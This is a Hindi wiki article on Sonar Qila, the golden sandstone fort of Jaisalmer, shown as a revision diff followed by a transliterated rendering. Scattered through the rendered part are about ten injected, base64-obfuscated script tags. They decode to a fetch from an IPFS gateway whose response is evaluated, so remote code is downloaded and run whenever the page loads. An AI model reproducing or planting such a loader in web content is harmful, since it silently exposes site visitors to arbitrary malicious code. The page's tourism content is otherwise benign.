Difference between revisions of "सोनार क़िला जैसलमेर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('सोनार क़िला जैसलमेर [[राजस्था...' के साथ नया पन्ना बनाया)
 
 
(19 intermediate revisions by 8 users not shown)
Line 1: Line 1:
[[सोनार क़िला उदयपुर|सोनार क़िला]]  
+
{{लेख सूची
[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। जैसलमेर का गौरवशाली दुर्ग त्रिभुजाकार पहाड़ी पर स्थित हैं। इसकी सुरक्षा के लिए इसके चारों ओर परकोटे पर तीस-तीस फीट ऊँची 99 बुर्जियाँ बनी हैं। चूँकि यह क़िला और इसमें स्थित सैंकड आवासीय भवन पीले पत्थरों से बने हुए है और सूर्य की रोशनी में स्वर्णिम आभा बिखेरते हैं इसलिए इसे सोनार क़िला के नाम से पुकारा जाता है।  
+
|लेख का नाम= जैसलमेर
 +
|पर्यटन= जैसलमेर पर्यटन
 +
|ज़िला= जैसलमेर ज़िला
 +
|प्रवास= जैसलमेर प्रवास
 +
}}
 +
{{सूचना बक्सा पर्यटन
 +
|चित्र=Sonar-Fort-Jaisalmer.jpg
 +
|चित्र का नाम=सोनार क़िला
 +
|विवरण='[[सोनार क़िला जैसलमेर|सोनार क़िला]]' [[राजस्थान]] के पर्यटन स्थलों में से एक है, जो [[जैसलमेर]] में स्थित है। यह क़िला और इसमें स्थित सैंकड़ों आवासीय भवन पीले पत्थरों से बने हुए है और [[सूर्य]] की रोशनी में स्वर्णिम आभा बिखेरते हैं इसलिए इसे सोनार क़िला के नाम से पुकारा जाता है।
 +
|राज्य=[[राजस्थान]]
 +
|ज़िला=[[जैसलमेर]]
 +
|निर्माता=
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=
 +
|भौगोलिक स्थिति=26° 54′ 45.72″ N, 70° 54′ 45.36″ E
 +
|मार्ग स्थिति=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|यातायात=
 +
|हवाई अड्डा=
 +
|रेलवे स्टेशन=
 +
|बस अड्डा=
 +
|कैसे पहुँचें=
 +
|क्या देखें=
 +
|कहाँ ठहरें=
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=
 +
|ए.टी.एम=
 +
|सावधानी=
 +
|मानचित्र लिंक=[https://www.google.co.in/maps/dir/Jaipur,+Rajasthan/Fort+Rd,+Amar+Sagar+Pol,+Jaisalmer+Fort,+Jaisalmer,+Rajasthan+345001/@26.649141,72.2246686,8z/data=!3m1!4b1!4m13!4m12!1m5!1m1!1s0x396c4adf4c57e281:0xce1c63a0cf22e09!2m2!1d75.7872709!2d26.9124336!1m5!1m1!1s0x3947bc2f4c9bdc21:0xc75a821a459f586!2m2!1d70.9123253!2d26.9123826 सोनार क़िला जैसलमेर गूगल मानचित्र]
 +
|संबंधित लेख= [[राजस्थान]], [[राजस्थान पर्यटन]], [[जैसलमेर]], [[सूर्य]], [[जैन]], [[संस्कृत भाषा|संस्कृत]], [[मागधी भाषा|मागधी]], [[पालि भाषा|पालि]], [[गुजराती भाषा]], [[डिंगल|डिंगल भाषा]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=वैष्णव मंदिरों के अलावा दुर्ग में स्थापत्य एवं शिल्प कला के सजीव केन्द्र के रूप में जैन मंदिर बने हुए हैं।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
{{अद्यतन|16:19, 9 अगस्त 2016 (IST)}}
 +
}}
 +
[[जैसलमेर]] [[राजस्थान]] का सबसे ख़ूबसूरत शहर है और [[जैसलमेर पर्यटन]] का सबसे आकर्षक स्थल माना जाता है। जैसलमेर का गौरवशाली दुर्ग त्रिभुजाकार पहाड़ी पर स्थित हैं। इसकी सुरक्षा के लिए इसके चारों ओर परकोटे पर तीस-तीस फीट ऊँची 99 बुर्जियाँ बनी हैं। चूँकि यह क़िला और इसमें स्थित सैंकड़ों अवासीय भवन पीले पत्थरों से बने हुए हैं और [[सूर्य]] की रोशनी में स्वर्णिम आभा बिखेरते हैं इसलिए इसे सोनार क़िला के नाम से पुकारा जाता है।  
  
अन्य वैष्णव मंदिरों के अलावा दुर्ग में स्थापत्य एवं शिल्प कला के सजीव केन्द्र के रूप में जैन मंदिर बने हुए हैं। "जिन भद्र सूरि ज्ञान भण्डार" दुर्ग स्थित [[जैन]] मंदिरों के तहखानों में बना हुआ है। जिन भद्रसूरि ज्ञान भण्डार प्राचीन ताड पत्रों व कागज़ी पुस्तकों एवं ग्रंथों के संग्रह के लिए प्रसिद्ध हैं। इसमें कई प्राचीन ग्रंथों का भण्डार हैं, जो [[संस्कृत भाषा|संस्कृत]], [[मागधी भाषा|मागधी]], [[पाली भाषा|पाली]], [[गुजराती|गुजराती भाषा]], [[मालवी|मालवी भाषा]], [[डिंगल|डिंगल भाषा]] व अन्य कई भाषाओं में अनेकों विषयों पर लिखे गये हैं।  
+
अन्य वैष्णव मंदिरों के अलावा दुर्ग में स्थापत्य एवं शिल्प कला के सजीव केन्द्र के रूप में जैन मंदिर बने हुए हैं। "जिन भद्र सूरि ज्ञान भण्डार" दुर्ग स्थित [[जैन]] मंदिरों के तहखानों में बना हुआ है। जिन भद्रसूरि ज्ञान भण्डार प्राचीन ताड पत्रों व काग़ज़ी पुस्तकों एवं ग्रंथों के संग्रह के लिए प्रसिद्ध हैं। इसमें कई प्राचीन ग्रंथों का भण्डार हैं, जो [[संस्कृत भाषा|संस्कृत]], [[मागधी भाषा|मागधी]], [[पालि भाषा|पालि]], [[गुजराती भाषा]], मालवी भाषा, [[डिंगल|डिंगल भाषा]] व अन्य कई भाषाओं में अनेकों विषयों पर लिखे गये हैं।  
 +
[[चित्र:Sonar-Kilaa-Jaisalmer-2.jpg|thumb|left|सोनार क़िला, [[जैसलमेर]]]]
 +
[[चित्र:Sonar-fort-Jaisalmer-2.jpg|thumb|left|सोनार क़िला, [[जैसलमेर]]]]
 +
{{प्रचार}}
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 +
{{Panorama
 +
|image= चित्र:Sonar-Fort-Jaisalmer-1.jpg
 +
|height= 260
 +
|alt=सोनार क़िला का विहंगम दृश्य
 +
|caption= सोनार क़िला का विहंगम दृश्य <br /> Panoramic View of Sonar Qila
 +
}}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Sonar-Fort-Jaisalmer-2.jpg|सोनार क़िला, [[जैसलमेर]]
 +
चित्र:Sonar-Fort-Jaisalmer-3.jpg|सोनार क़िला
 +
</gallery>
  
[[Category:राजस्थान]][[Category:राजस्थान_के_पर्यटन_स्थल]][[Category:पर्यटन_कोश]]__INDEX__
+
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}{{भारत के दुर्ग}}
 +
 
 +
[[Category:जैसलमेर]]
 +
[[Category:राजस्थान]]
 +
[[Category:राजस्थान_के_पर्यटन_स्थल]]
 +
[[Category:भारत के दुर्ग]][[Category:स्थापत्य कला]][[Category:ऐतिहासिक स्थल]][[Category:कला कोश]][[Category:पर्यटन कोश]][[Category:इतिहास कोश]]  
 +
__INDEX__

Latest revision as of 09:13, 28 September 2016

jaisalamer jaisalamer paryatan jaisalamer zila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sonar qila jaisalamer
vivaran 'sonar qila' rajasthan ke paryatan sthaloan mean se ek hai, jo jaisalamer mean sthit hai. yah qila aur isamean sthit saiank doan avasiy bhavan pile pattharoan se bane hue hai aur soory ki roshani mean svarnim abha bikherate haian isalie ise sonar qila ke nam se pukara jata hai.
rajy rajasthan
zila jaisalamer
bhaugolik sthiti 26° 54′ 45.72″ N, 70° 54′ 45.36″ E
chitr:Map-icon.gif sonar qila jaisalamer googal manachitr
sanbandhit lekh rajasthan, rajasthan paryatan, jaisalamer, soory, jain, sanskrit, magadhi, pali, gujarati bhasha, diangal bhasha


any janakari vaishnav mandiroan ke alava durg mean sthapaty evan shilp kala ke sajiv kendr ke roop mean jain mandir bane hue haian.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jaisalamer rajasthan ka sabase khoobasoorat shahar hai aur jaisalamer paryatan ka sabase akarshak sthal mana jata hai. jaisalamer ka gauravashali durg tribhujakar paha di par sthit haian. isaki suraksha ke lie isake charoan or parakote par tis-tis phit ooanchi 99 burjiyaan bani haian. chooanki yah qila aur isamean sthit saiank doan avasiy bhavan pile pattharoan se bane hue haian aur soory ki roshani mean svarnim abha bikherate haian isalie ise sonar qila ke nam se pukara jata hai.

any vaishnav mandiroan ke alava durg mean sthapaty evan shilp kala ke sajiv kendr ke roop mean jain mandir bane hue haian. "jin bhadr soori jnan bhandar" durg sthit jain mandiroan ke tahakhanoan mean bana hua hai. jin bhadrasoori jnan bhandar prachin tad patroan v kagazi pustakoan evan granthoan ke sangrah ke lie prasiddh haian. isamean kee prachin granthoan ka bhandar haian, jo sanskrit, magadhi, pali, gujarati bhasha, malavi bhasha, diangal bhasha v any kee bhashaoan mean anekoan vishayoan par likhe gaye haian. [[chitr:Sonar-Kilaa-Jaisalmer-2.jpg|thumb|left|sonar qila, jaisalamer]] [[chitr:Sonar-fort-Jaisalmer-2.jpg|thumb|left|sonar qila, jaisalamer]] <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>sonar qila ka vihangam drishy
Panoramic View of Sonar Qila

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>